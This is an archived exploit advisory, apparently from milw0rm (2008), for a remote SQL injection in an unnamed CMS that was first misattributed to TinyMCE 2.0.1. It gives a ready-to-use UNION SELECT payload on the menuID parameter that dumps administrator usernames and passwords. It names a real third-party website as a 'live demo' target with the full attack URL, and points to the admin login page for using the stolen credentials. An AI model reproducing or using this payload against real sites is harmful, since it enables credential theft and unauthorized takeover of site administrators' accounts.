# removed from the frontend, the product affected isn't TinyMCE.
# if you know which CMS this is please contact me
# /str0ke
************************************************************
** TinyMCE Remote SQL Injection
************************************************************
** Prodcut: TinyMCE Version 2.0.1
** Home : http://tinymce.moxiecode.com
** Vunlerability : 2/ SQL Injection
** Risk : high !!
** Dork : N/A
************************************************************
** Discovred by: AnGeL25dZ
** From : Constantine - Algeria
** Contact : angel25dz@gmail.com
** *********************************************************
** Greetz to : ALLAH
** All Members of HackTeachTeam http://www.hackteach.org/
** Ra3ch, His0k4
************************************************************
** Remote SQL Injection vulnerability
**
** Exploit :index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
**
** Use : http://[path]/Exploit
** Admin : http://[path]/cms/login.php
****************************************************************
** Live demo : http://www.uitgeverijginkgo.nl/index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
**
****************************************************************
# milw0rm.com [2008-12-17]